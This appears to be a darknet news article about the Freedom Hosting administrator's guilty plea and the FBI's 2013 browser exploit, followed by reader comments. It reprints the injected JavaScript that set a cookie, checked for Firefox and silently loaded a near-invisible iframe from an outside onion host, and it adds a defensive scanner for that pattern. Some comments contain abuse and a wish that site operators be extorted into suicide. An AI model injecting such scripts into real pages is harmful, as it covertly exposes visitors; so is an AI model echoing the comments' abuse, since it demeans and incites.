Freedom Hosting Admin Admits Child Pornography Charges

Eric Eoin Marques, the creator and administrator of Freedom Hosting, pleaded guilty to conspiracy to advertise child pornography. Freedom Hosting, at its height, was the largest Tor webhost and the FBI called Marques “the largest facilitator of child porn on the planet.”

Marques admitted operating Freedom Hosting between 2008 and 2013, until his arrest in Dublin, Ireland. Investigators learned that Marques had helped operate “criminal communities dedicated to the sexual exploitation of children.” He was not a “hands off” administrator and actively participated in the child exploitation forums hosted on Freedom Hosting.

Freedom Hosting homepage


Law enforcement in Ireland arrested Marques after a grand jury had returned an indictment charging him with the following crimes:

An example of his active participation and acknowledgement of the illegal forums using Freedom Hosting:

On April 24, 2013, a user of Website A posted a message asking whether the anonymous hosting service (AHS) is free to the end user. On April 25, 2013, the administrator of Website A responded that the AHS is “100% free” and that the administrator assumes that “the admin covers [the cost] himself as a service to the [Network] pedo community.”

Website A, in this instance, is a reference to one of the largest child exploitation forums at the time. In a similar thread, users of the forum talked about Marques’ additional involvement:

On May 31, 2013, the administrator of Website A replied to a user that claimed, “[AHS] has NO control of the sites it hosts. It only hosts them.” The administrator responded, stating, “In reality [AHS] has full control over all the websites hosted on their servers. In fact, just a few days ago they patched a few of the core files running this very forum.” Later in the same conversation, the administrator noted that, though AHS does not “create or maintain (as far as I know) any of the sites they are hosting,” AHS could “do whatever they wanted with the sites they host as they inherently have full access to the databases behind the sites.”

Freedom Hosting hosted, in total, more than 8.5 million images of child exploitation material, according to an announcement from the Department of Justice. (Marques had little to no involvement in the administration of the majority of the sites hosted by Freedom Hosting. The government focused entirely on child pornography crimes.)

After seizing Freedom Hosting servers, the FBI relaunched the service using servers under their control in Maryland.

FBI describes the operation in the criminal complaint


On August 1, 2013, some savvy Tor users began noticing that the Freedom Hosting sites were serving a hidden “iframe”—a kind of website within a website. The iframe contained Javascript code that used a Firefox vulnerability to execute instructions on the victim’s computer. The code specifically targeted the version of Firefox used in the Tor Browser Bundle—the easiest way to use Tor.

— “Visit the Wrong Website, and the FBI Could End Up in Your Computer,” Kevin Poulsen, wired.com/2014/08/operation-torpedo/

The compromised server injected an iframe and then injected additional iframes with scripts that checked the visitor’s browser version (see CVE-2013-1690 for more information). If a user’s browser version met the requirements (Firefox 17 on Windows), it would download an infected payload that sent the target’s MAC address and Windows hostname to a server in Virginia controlled by the FBI. This exploit required JavaScript, and the Tor Browser Bundle shipped with JavaScript enabled by default.

Below is the first indication that something was not right. The full code consists of multiple scripts and is far too long to embed here. You can check it out here, though: Magneto

function createCookie(name,value,minutes) {
	if (minutes) {
		var date = new Date();
		date.setTime(date.getTime()+(minutes*60*1000));
		var expires = "; expires="+date.toGMTString();
	}
	else var expires = "";
	document.cookie = name+"="+value+expires+"; path=/";
}

function readCookie(name) {
    var nameEQ = name + "=";
    var ca = document.cookie.split(';');
    for(var i=0;i < ca.length;i++) {
    	var c = ca[i];
    	while (c.charAt(0)==' ') c = c.substring(1,c.length);
    	if (c.indexOf(nameEQ) == 0) return c.substring(nameEQ.length,c.length);
    }
    return null;
}

function isFF() {
    return (document.getBoxObjectFor != null || window.mozInnerScreenX != null || /Firefox/i.test(navigator.userAgent));
}

function updatify() {
    var iframe = document.createElement('iframe');
    iframe.style.display = "inline";
    iframe.frameBorder = "0";
    iframe.scrolling = "no";
    iframe.src = "http://nl7qbezu7pqsuone.onion?requestID=XXXXXXXX-XXXX-XXXX-XXXX-XXXXXXXXXXXX";
    iframe.height = "5";
    iframe.width = "*";
    document.body.appendChild(iframe);
}

function format_quick() {
    if ( ! readCookie("n_serv") ) {
        createCookie("n_serv", "XXXXXXXX-XXXX-XXXX-XXXX-XXXXXXXXXXXX", 30);
        updatify();
    }
}

function isReady()
{
    if ( document.readyState === "interactive" || document.readyState === "complete" ) {
    
        if ( isFF() ) {
            format_quick();
        }
    }
    else
    {
        setTimeout(isReady, 250);
    }
}
setTimeout(isReady, 250);
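
Added example, not part of the original article or of the recovered script: a heuristic static check a site operator or incident responder could run over inline scripts to flag the pattern shown above, a near-invisible off-origin iframe created behind a browser check and a one-shot cookie. The function name, indicator set, threshold of two traits, and the hosts forum.example and frame-host.example are assumptions made for illustration; both samples are constructed.

```javascript
// Added example: heuristic static triage of a page's inline scripts.
// Indicator names and the scoring threshold are assumptions of this sketch.
const INDICATORS = {
  tinyFrame: /\.(?:height|width)\s*=\s*["']?[0-5]["']?\s*;/,
  borderless: /\.frameBorder\s*=\s*["']?0/,
  uaGate: /navigator\.userAgent|mozInnerScreenX|getBoxObjectFor/,
  cookieGate: /document\.cookie/,
  readyPoll: /setTimeout\(\s*\w+\s*,\s*\d+\s*\)/,
};

function triageScript(source, pageHost) {
  const createsFrame = /createElement\(\s*["']iframe["']\s*\)/.test(source);
  const appended = /\.appendChild\(/.test(source);
  // Host of any literal URL assigned to a .src property.
  const m = /\.src\s*=\s*["']https?:\/\/([^"'\/?#]+)/.exec(source);
  const frameHost = m ? m[1].toLowerCase() : null;
  const offOrigin = frameHost !== null && frameHost !== pageHost.toLowerCase();
  const hits = Object.keys(INDICATORS).filter((k) => INDICATORS[k].test(source));
  // Flag only when a frame is built, attached and pointed off-origin, AND
  // at least two of the stealth/gating traits are present.
  const suspicious = createsFrame && appended && offOrigin && hits.length >= 2;
  return { suspicious, frameHost, hits };
}

// Constructed sample, condensed from the structure of the script above.
const INJECTED = `
function isFF(){ return window.mozInnerScreenX != null || /Firefox/i.test(navigator.userAgent); }
function updatify(){
  var iframe = document.createElement('iframe');
  iframe.frameBorder = "0"; iframe.height = "5";
  iframe.src = "http://frame-host.example?requestID=PLACEHOLDER";
  document.body.appendChild(iframe);
}
function go(){ if (document.cookie.indexOf("n_serv=") < 0 && isFF()) updatify(); }
setTimeout(go, 250);`;

// Constructed benign sample: a visible, same-site embed.
const BENIGN = `
var f = document.createElement("iframe");
f.height = "480"; f.width = "640";
f.src = "https://forum.example/embed/player";
document.getElementById("video").appendChild(f);`;

console.log(triageScript(INJECTED, "forum.example"));
console.log(triageScript(BENIGN, "forum.example"));
```

A match is a prompt to diff the served page against the files on disk, not proof of compromise; legitimate analytics snippets can share some of these traits.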

Marques is scheduled for sentencing on May 11, 2020. He faces a mandatory minimum sentence of 15 years in prison.

Previously: DOJ: Freedom Hosting Admin has been Extradited to the US

h/t @just_some_d00d

Comments Closed

WeAreAMSTERDAM

Sick people. Go offline on tor network retards.

bfj

and nothing of value was lost.

Frosty

one more nasty piece of shit hits the bowl

onemoretogo

i hope they catch the squaremarket admin too sick fucks

dnl

can you show a comparison between what a site looks like normal and what a site looks like with iframe?

para

CP aside, Freedom Hosting was a great service

kertlepinginassist

onemoretogo

“i hope the catch the squaremarket admins too sick fucks”

What do you mean? How do you know the admins of squaremarket and why are they sick fucks?

Frosty

Didn't know hosting on Freedom Hosting was free. That's cool... not cool CP was how it stayed afloat

Frosty

WeAreAmsterdam is a scammer, unless of course they lost access to email. Do not order from them. Nothing shows.

heykertlepinginassist

squaremarket allowed cp for a long time that is why they were never listed on deepdotweb when it was still around and still not many sites list them

DNL

In reply to heykertlepinginassist

Law enforcement had seized DeepDotWeb long before Square Market launched. The market itself has not existed a “long time” yet.

hairyballs

15 years for this piece of shit is a joke, 150 years would not be long enough. Wish these other pieces of shit who DDOS the fuck out of these markets would target these Pedo Sites, surely they could extort the fuck out of them until they kill themselves, hopefully!

cun0x

whack boy. CP rlly bad.

Klep

These guys need to all GO. It's so disgusting how can you even get off on a young human like they aren't even developed.

fucksquaremarket

sick fucks he got only 15 years wtttttfffff!!!

malz

fuck Ross for life, and he gets 15 years? fuck the American justice system

Chickshaveboobs

Do you guys not know what a mandatory minimum sentence is? 15 years is the MINIMUM he will serve. It’s highly unlikely the judge will give him the lightest sentence. This guy’s going away for life

scumbag

i just hope i can join these sick fucks in prison